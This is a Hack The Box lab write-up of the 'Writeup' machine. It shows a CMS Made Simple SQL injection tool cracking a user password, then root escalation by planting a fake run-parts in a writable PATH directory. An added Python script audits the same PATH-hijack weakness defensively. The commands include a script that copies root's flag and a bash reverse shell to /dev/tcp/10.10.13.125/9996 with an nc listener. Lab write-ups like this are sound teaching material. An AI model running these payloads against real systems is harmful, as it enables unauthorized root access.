Hackthebox – Write-up

As with any box, this one started with the default sequence of full port scans: TCP (all ports), UDP (top 20) and a TCP -A scan.

root@kalivm:~/WriteUp# nmap -A -oN fullscan-A 10.10.10.138 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-02 18:41 CEST
Nmap scan report for 10.10.10.138
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   16.03 ms 10.10.12.1
2   16.06 ms 10.10.10.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 26 12:53:01 2019 -- 1 IP address (1 host up) scanned in 26.72 seconds

Nothing particularly interesting, so I started browsing the web server and found a robots.txt file containing a reference to a /writeup directory, referring to a blog.

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/

Analysis of the blog shows that the blogging software CMS Made Simple is used.
[Image: source of the Writeup main page showing CMS Made Simple]
Research shows several vulnerabilities, including a SQL injection vulnerability with a ready-made exploitation script. When run, the script shows a Hollywood-style password cracking animation and returns both the username and the password.

root@kalivm:~/WriteUp# ./cmsms.py -u http://writeup.htb/writeup -w /usr/share/wordlists/rockyou.txt -c

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

root@kalivm:~/WriteUp# ssh jkr@writeup.htb
jkr@writeup.htb's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug  2 12:56:35 2019 from 10.10.15.39
jkr@writeup:~$ cat user.txt
d4e493fd4<noflag>b1aa6a55319f978

Privilege escalation

After some initial enumeration, I found a set of writable directories that seemed remarkable but that I had no good use for yet.

jkr@writeup:~$ find / -writable -type d 2>/dev/null
---snip---
/var/local
/var/lib/php/sessions
/var/tmp
/usr/local
/usr/local/bin
/usr/local/sbin
---snip---
/home/jkr
/home/jkr/.nano

Other than that, no specific items stood out and it was time to start analyzing running processes. Since ps aux only shows currently running processes, pspy is very useful for watching spawned processes in real time. Within a short time this produced something that really stood out.

jkr@writeup:/tmp/sed$ wget http://10.10.15.83:8000/enum/pspy64
--2019-08-02 13:10:12--  http://10.10.15.83:8000/enum/pspy64
Connecting to 10.10.15.83:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4468984 (4.3M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64               100%[===============================>]   4.26M  5.66MB/s    in 0.8s

2019-08-02 13:10:12 (5.66 MB/s) - ‘pspy64’ saved [4468984/4468984]

jkr@writeup:/tmp/sed$ chmod +x pspy64 
jkr@writeup:/tmp/sed$ ./pspy64 
---snip---
2019/08/02 13:11:29 CMD: UID=0    PID=6594   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
---snip---

Now this is where things get interesting. PATH is set to include /usr/local/sbin first (which, as I found earlier, is writable), and run-parts is invoked by bare name rather than by its full path. This allowed me to create a short script that copies root.txt to /tmp and changes its permissions so I can read it.
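The weakness in the motd hook is a generic one: a privileged job runs a command by bare name under a PATH whose leading entries are writable by an unprivileged user. The following Python audit is an added example and not part of the original write-up. It takes a command line as pspy printed it (SAMPLE_CMD below is a constructed copy of the line above), walks PATH in the same order execvp does, and reports where the command actually resolves and which writable directories are searched before it. It serves both the writable-directory enumeration above and the pspy finding: SAMPLE_DIRS is constructed from the find output, the location of run-parts in /bin is an assumption (Debian's debianutils), and probe_dirs performs the same check against the live filesystem using the rights of whichever account runs it.

```python
import os
import shlex

# Constructed sample input: the command line observed by pspy in the write-up,
# used as the input to this audit (example code, not part of the original post).
SAMPLE_CMD = (
    "sh -c /usr/bin/env -i "
    "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin "
    "run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new"
)

# Constructed view of the box's filesystem: dir -> (writable by the low-privileged
# user, contains the invoked binary). Writability mirrors the `find / -writable`
# output above; run-parts living in /bin is an assumption (Debian's debianutils).
SAMPLE_DIRS = {
    "/usr/local/sbin": (True, False),
    "/usr/local/bin": (True, False),
    "/usr/sbin": (False, False),
    "/usr/bin": (False, False),
    "/sbin": (False, False),
    "/bin": (False, True),
}


def parse_env_path(cmdline):
    """Extract (PATH value, first command run under it) from an
    `env ... PATH=... cmd args` invocation. Returns (None, None) without PATH=."""
    tokens = shlex.split(cmdline)
    for i, tok in enumerate(tokens):
        if tok.startswith("PATH="):
            path = tok[len("PATH="):]
            # Skip further VAR=value assignments and env options to reach the command.
            for nxt in tokens[i + 1:]:
                if "=" in nxt or nxt.startswith("-"):
                    continue
                return path, nxt
            return path, None
    return None, None


def hijack_risk(path, cmd, dir_info):
    """Walk PATH in execvp order and report where `cmd` resolves and which
    writable directories are searched before it (those can shadow the real binary).
    dir_info: {dir: (unprivileged_writable, has_cmd)}."""
    result = {"command": cmd, "resolved": None, "shadowing_dirs": [], "vulnerable": False}
    if cmd is None or os.path.isabs(cmd):
        return result  # absolute path: PATH is never consulted
    for d in path.split(":"):
        writable, has_cmd = dir_info.get(d, (False, False))
        if has_cmd:
            result["resolved"] = d
            # A writable directory that already holds the binary is just as bad.
            if writable:
                result["shadowing_dirs"].append(d)
            break
        if writable:
            result["shadowing_dirs"].append(d)
    result["vulnerable"] = bool(result["shadowing_dirs"])
    return result


def probe_dirs(path, cmd):
    """Build dir_info from the live filesystem using the current user's rights
    (run it as the low-privileged account you are auditing)."""
    info = {}
    for d in path.split(":"):
        target = os.path.join(d, cmd)
        info[d] = (os.path.isdir(d) and os.access(d, os.W_OK),
                   os.path.isfile(target) and os.access(target, os.X_OK))
    return info


def audit_cmdline(cmdline, dir_info=None):
    """Audit one root-run command line; dir_info defaults to a live probe."""
    path, cmd = parse_env_path(cmdline)
    if path is None or cmd is None:
        return {"command": cmd, "resolved": None, "shadowing_dirs": [], "vulnerable": False}
    if dir_info is None:
        dir_info = probe_dirs(path, cmd)
    return hijack_risk(path, cmd, dir_info)


if __name__ == "__main__":
    report = audit_cmdline(SAMPLE_CMD, SAMPLE_DIRS)
    print(report)
    if report["vulnerable"]:
        print("Fix: invoke %s by absolute path (%s) and remove write access to %s"
              % (report["command"],
                 os.path.join(report["resolved"] or "?", report["command"]),
                 ", ".join(report["shadowing_dirs"])))
```

Run as the unprivileged user against lines collected from pspy or from /etc/cron* and /etc/update-motd.d, the live probe flags exactly the two conditions the escalation relied on; either fix (calling the binary by absolute path, or taking write access away from the leading PATH entries) makes the report come back clean, which is what the test checks on the constructed data.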

jkr@writeup:/tmp$ mkdir sed
jkr@writeup:/tmp$ cd sed
jkr@writeup:/tmp/sed$ nano rp
#!/usr/bin/env bash
cp /root/root.txt /tmp/sed/sed.txt
chmod 777 /tmp/sed/sed.txt
jkr@writeup:/tmp/sed$ chmod +x rp

Copy the created script to /usr/local/sbin as run-parts and then wait until someone logs in again, triggering the script.

jkr@writeup:/tmp/sed$ mv rp /usr/local/sbin/run-parts
jkr@writeup:/tmp/sed$ ls
sed.txt
jkr@writeup:/tmp/sed$ cat sed.txt 
eeba47f60b4<noflag>4f9b6198d7226

Alternative Privilege Escalation

As an alternative, I could also have added a reverse shell to my own machine.

jkr@writeup:/tmp/sed$ nano rp
#!/bin/bash
bash -i >& /dev/tcp/10.10.13.125/9996 0>&1
jkr@writeup:/tmp/sed$ chmod +x rp
jkr@writeup:/tmp/sed$ cp rp /usr/local/sbin/run-parts

Copy the script and wait until someone logs in, while having a listener running on my own system.

root@kalivm:~/WriteUp# nc -nlvp 9996
Listening on [0.0.0.0] (family 2, port 9996)
Connection from 10.10.10.138 54582 received!
bash: cannot set terminal process group (2099): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# cat /root/root.txt
eeba47f60b4<noflag>4f9b6198d7226
